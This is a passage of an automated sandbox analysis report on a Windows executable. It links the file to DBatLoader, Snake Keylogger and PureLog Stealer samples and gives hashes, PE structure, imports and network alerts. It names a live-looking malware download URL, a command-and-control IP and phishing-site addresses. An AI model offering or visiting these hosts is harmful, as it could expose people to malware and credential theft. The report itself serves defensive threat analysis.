              ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • amazonenviro.com/245_Aiymwhpjxsg
              yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • amazonenviro.com/245_Aiymwhpjxsg
              ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • amazonenviro.com/245_Aiymwhpjxsg
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              amazonenviro.comJDQS879kiy.exeGet hashmaliciousDBatLoaderBrowse
              • 166.62.27.188
              UAHIzSm2x2.exeGet hashmaliciousDBatLoaderBrowse
              • 166.62.27.188
              LbZ88q4uPa.exeGet hashmaliciousDBatLoaderBrowse
              • 166.62.27.188
              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 166.62.27.188
              zYj1wg0cM2.docGet hashmaliciousDBatLoaderBrowse
              • 166.62.27.188
              ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 166.62.27.188
              yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 166.62.27.188
              ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 166.62.27.188
              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 166.62.27.188
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              AS-26496-GO-DADDY-COM-LLCUSOn9ahUpI4R.exeGet hashmaliciousDBatLoaderBrowse
              • 166.62.27.188
              JDQS879kiy.exeGet hashmaliciousDBatLoaderBrowse
              • 166.62.27.188
              UAHIzSm2x2.exeGet hashmaliciousDBatLoaderBrowse
              • 166.62.27.188
              LbZ88q4uPa.exeGet hashmaliciousDBatLoaderBrowse
              • 166.62.27.188
              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 166.62.27.188
              trow.exeGet hashmaliciousUnknownBrowse
              • 107.180.98.101
              https://upholl-xlognusa.godaddysites.com/Get hashmaliciousUnknownBrowse
              • 198.71.248.123
              3.elfGet hashmaliciousUnknownBrowse
              • 184.168.52.170
              http://logiinnmaskemettaha93.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
              • 198.71.248.123
              http://app-metamask.godaddysites.com/Get hashmaliciousUnknownBrowse
              • 198.71.248.123
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              a0e9f5d64349fb13191bc781f81f42e1On9ahUpI4R.exeGet hashmaliciousDBatLoaderBrowse
              • 166.62.27.188
              JDQS879kiy.exeGet hashmaliciousDBatLoaderBrowse
              • 166.62.27.188
              UAHIzSm2x2.exeGet hashmaliciousDBatLoaderBrowse
              • 166.62.27.188
              LbZ88q4uPa.exeGet hashmaliciousDBatLoaderBrowse
              • 166.62.27.188
              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 166.62.27.188
              183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
              • 166.62.27.188
              uo9m.exeGet hashmaliciousLummaCBrowse
              • 166.62.27.188
              uo9m.exeGet hashmaliciousLummaCBrowse
              • 166.62.27.188
              YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
              • 166.62.27.188
              No context
              No created / dropped files found
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.249672812956651
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.38%
              • InstallShield setup (43055/19) 0.43%
              • Windows Screen Saver (13104/52) 0.13%
              • Win16/32 Executable Delphi generic (2074/23) 0.02%
              • Generic Win/DOS Executable (2004/3) 0.02%
              File name:UTstKgkJNY.exe
              File size:1'161'216 bytes
              MD5:7e6af615a074f41ea63ef69a047e8f6d
              SHA1:a466ec15884ee1ab19dd0bed7327ffcf1db4a6f2
              SHA256:939c125accb6e2f939bc239c45d3ead938a0c0bcd63d77fbde11ed96ed1a1c76
              SHA512:0a0fb978deddfdae81ef9a44c0f424520fc43e89a52478540decc381490f3ece450b70799e7f995cb05e5ab4c47758db3e401fb52d11673598778489542e21b2
              SSDEEP:24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
              TLSH:D435BF7790B387FAC05689798D5FA7E4653EA830392CBA42FED17E0C5F24146B838197
              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
              Icon Hash:4f858a8c8e8e8946
              Entrypoint:0x46e80c
              Entrypoint Section:.itext
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              DLL Characteristics:
              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:44c8864bd68c3bff94639c69671ea4b7
              Instruction
              push ebp
              mov ebp, esp
              add esp, FFFFFFF0h
              mov eax, 0046D250h
              call 00007F7480D6DB21h
              mov ecx, dword ptr [00470E9Ch]
              mov eax, dword ptr [00470D8Ch]
              mov eax, dword ptr [eax]
              mov edx, dword ptr [0046CB00h]
              call 00007F7480DC39B9h
              mov eax, dword ptr [00470D8Ch]
              mov eax, dword ptr [eax]
              call 00007F7480DC3A2Dh
              call 00007F7480D6B980h
              lea eax, dword ptr [eax+00h]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x750000x266e.idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000xa1c00.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x7ce8.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x790000x18.rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x757540x600.idata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x6c4c00x6c60069c4173c38ad27686fb46f69fd79ec91False0.5070961288927336data6.531494017298441IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .itext0x6e0000x8480xa00639613140a642faedd01bff468c3e3cfFalse0.523828125data5.552779847613545IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .data0x6f0000x1f400x200053b6dd6978c858db7e9faa57954b9c18False0.3963623046875data3.804120578626792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .bss0x710000x36ec0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .idata0x750000x266e0x2800f0f9a1156b641e5ea253cb6ddcaf08baFalse0.3103515625data4.872671403071516IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .tls0x780000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rdata0x790000x180x2005b11e123dd9b7f6d94b27d2ad6e9bc83False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x7a0000x7ce80x7e003b0f62de599dc8a77438a9e2115a0b81False0.6107390873015873data6.679791141044884IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              .rsrc0x820000xa1c000xa1c00d053912a545242d9b45af7295b4d7b07False0.5014988045788253data7.102983757450699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_CURSOR0x832440x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
              RT_CURSOR0x833780x134dataEnglishUnited States0.4642857142857143
              RT_CURSOR0x834ac0x134dataEnglishUnited States0.4805194805194805
              RT_CURSOR0x835e00x134dataEnglishUnited States0.38311688311688313
              RT_CURSOR0x837140x134dataEnglishUnited States0.36038961038961037
              RT_CURSOR0x838480x134dataEnglishUnited States0.4090909090909091
              RT_CURSOR0x8397c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
              RT_BITMAP0x83ab00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
              RT_BITMAP0x83c800x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
              RT_BITMAP0x83e640x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
              RT_BITMAP0x840340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
              RT_BITMAP0x842040x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
              RT_BITMAP0x843d40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
              RT_BITMAP0x845a40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
              RT_BITMAP0x847740x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
              RT_BITMAP0x849440x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
              RT_BITMAP0x84b140x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
              RT_BITMAP0x84ce40x81940Device independent bitmap graphic, 971 x 182 x 24, image size 530712EnglishUnited States0.497995297238635
              RT_BITMAP0x1066240x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.39864864864864863
              RT_BITMAP0x10674c0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
              RT_BITMAP0x1068740x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
              RT_BITMAP0x10699c0xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
              RT_BITMAP0x106a840x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3614864864864865
              RT_BITMAP0x106bac0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
              RT_BITMAP0x106cd40xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.49038461538461536
              RT_BITMAP0x106da40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3716216216216216
              RT_BITMAP0x106ecc0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.2905405405405405
              RT_BITMAP0x106ff40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.38175675675675674
              RT_BITMAP0x10711c0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
              RT_BITMAP0x1072440x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
              RT_BITMAP0x10736c0xe8Device independent bitmap graphic, 12 x 16 x 4, image size 128EnglishUnited States0.3620689655172414
              RT_BITMAP0x1074540x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
              RT_BITMAP0x10757c0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.375
              RT_BITMAP0x1076a40xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
              RT_BITMAP0x1077740x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.36824324324324326
              RT_BITMAP0x10789c0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
              RT_BITMAP0x1079c40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
              RT_BITMAP0x107aec0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.375
              RT_BITMAP0x107c140x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.375
              RT_BITMAP0x107d3c0xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
              RT_BITMAP0x107e240x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.35135135135135137
              RT_BITMAP0x107f4c0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.36486486486486486
              RT_BITMAP0x1080740xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
              RT_BITMAP0x1081440x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
              RT_BITMAP0x10826c0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
              RT_BITMAP0x1083940xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
              RT_ICON0x10847c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 40314 x 40314 px/m0.40560165975103735
              RT_DIALOG0x10aa240x52data0.7682926829268293
              RT_DIALOG0x10aa780x52data0.7560975609756098
              RT_STRING0x10aacc0x35cdata0.45348837209302323
              RT_STRING0x10ae280x2d8data0.4642857142857143
              RT_STRING0x10b1000xc0data0.6770833333333334
              RT_STRING0x10b1c00xecdata0.6483050847457628
              RT_STRING0x10b2ac0x350data0.43514150943396224
              RT_STRING0x10b5fc0x3ccdata0.37962962962962965
              RT_STRING0x10b9c80x388data0.4092920353982301
              RT_STRING0x10bd500x418data0.36736641221374045
              RT_STRING0x10c1680x140data0.515625
              RT_STRING0x10c2a80xccdata0.6127450980392157
              RT_STRING0x10c3740x1ecdata0.5345528455284553
              RT_STRING0x10c5600x3b0data0.326271186440678
              RT_STRING0x10c9100x354data0.4107981220657277
              RT_STRING0x10cc640x2a4data0.4363905325443787
              RT_RCDATA0x10cf080x10data1.5
              RT_RCDATA0x10cf180x338data0.6905339805825242
              RT_RCDATA0x10d2500x1657cGIF image data, version 89a, 360 x 360EnglishUnited States0.594726605183793
              RT_RCDATA0x1237cc0x369Delphi compiled form 'TForm1'0.6071019473081328
              RT_GROUP_CURSOR0x123b380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
              RT_GROUP_CURSOR0x123b4c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
              RT_GROUP_CURSOR0x123b600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
              RT_GROUP_CURSOR0x123b740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
              RT_GROUP_CURSOR0x123b880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
              RT_GROUP_CURSOR0x123b9c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
              RT_GROUP_CURSOR0x123bb00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
              RT_GROUP_ICON0x123bc40x14data1.25
              DLLImport
              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
              user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
              kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
              user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
              gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
              version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
              kernel32.dlllstrcpyA, lstrcatA, _lread, _lopen, _llseek, _lclose, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
              oleaut32.dllCreateErrorInfo, GetErrorInfo, SetErrorInfo, SysFreeString
              ole32.dllCoCreateInstance, CoUninitialize, CoInitialize
              kernel32.dllSleep
              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
              comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
              comdlg32.dllGetOpenFileNameA
              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States
              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2025-01-14T08:25:03.113199+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049706166.62.27.188443TCP
              2025-01-14T08:25:04.606069+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049708166.62.27.188443TCP
              2025-01-14T08:25:06.322079+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049710166.62.27.188443TCP
              2025-01-14T08:25:07.972097+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049718166.62.27.188443TCP
              2025-01-14T08:25:09.616455+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049728166.62.27.188443TCP
              2025-01-14T08:25:11.252572+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049738166.62.27.188443TCP
              2025-01-14T08:25:13.028589+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049750166.62.27.188443TCP
              2025-01-14T08:25:14.685126+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049762166.62.27.188443TCP
              2025-01-14T08:25:16.337260+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049773166.62.27.188443TCP
              2025-01-14T08:25:17.972623+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049786166.62.27.188443TCP
              2025-01-14T08:25:19.592300+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049799166.62.27.188443TCP
              2025-01-14T08:25:21.221630+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049809166.62.27.188443TCP
              2025-01-14T08:25:22.840018+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049822166.62.27.188443TCP
              2025-01-14T08:25:24.591649+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049835166.62.27.188443TCP
              2025-01-14T08:25:26.232730+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049847166.62.27.188443TCP
              2025-01-14T08:25:27.874388+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049860166.62.27.188443TCP
              2025-01-14T08:25:29.493433+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049871166.62.27.188443TCP
              2025-01-14T08:25:31.110157+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049884166.62.27.188443TCP
              2025-01-14T08:25:32.713974+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049895166.62.27.188443TCP
              2025-01-14T08:25:34.389067+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049906166.62.27.188443TCP
              2025-01-14T08:25:36.002641+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049919166.62.27.188443TCP
              2025-01-14T08:25:37.619233+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049932166.62.27.188443TCP
              2025-01-14T08:25:39.366946+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049944166.62.27.188443TCP
              2025-01-14T08:25:40.989375+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049958166.62.27.188443TCP
              2025-01-14T08:25:42.609774+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049967166.62.27.188443TCP
              2025-01-14T08:25:44.255309+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049980166.62.27.188443TCP
              2025-01-14T08:25:45.878917+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049991166.62.27.188443TCP
              2025-01-14T08:25:47.475932+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050004166.62.27.188443TCP
              2025-01-14T08:25:49.094571+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050018166.62.27.188443TCP
              2025-01-14T08:25:50.705630+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050028166.62.27.188443TCP
              2025-01-14T08:25:52.339628+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050034166.62.27.188443TCP
              2025-01-14T08:25:53.961969+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050036166.62.27.188443TCP
              2025-01-14T08:25:55.588546+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050039166.62.27.188443TCP
